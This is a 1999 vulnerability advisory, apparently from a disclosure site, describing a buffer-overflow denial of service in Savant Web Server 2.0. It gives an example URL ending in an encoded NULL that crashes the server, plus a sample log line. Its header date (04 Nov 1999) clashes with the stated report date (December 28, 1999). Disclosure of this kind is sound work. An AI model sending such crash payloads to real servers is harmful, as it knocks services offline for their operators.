Savant Web Server DoS - 04 Nov 1999

 
Savant Web Server 2.0 Denial of Service
Reported December 28, 1999 by
USSRLabs

VERSIONS AFFECTED
Savant Web Server 2.0

DESCRIPTION

Savant Web Server has a buffer overflow condition caused by  appending a NULL character to the end of a URL. The problem causes the server to crash.

Example:
http://www.s0mep00rs4p.com/%00/

The action is logged and looks similar to the entry below:

Attacker Ip - - \[28/Dec/1999:01:11:37 -0600\] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.
htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279


VENDOR RESPONSE

None known at the time of this writing.

CREDITS
Discovered by
USSRLabs

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish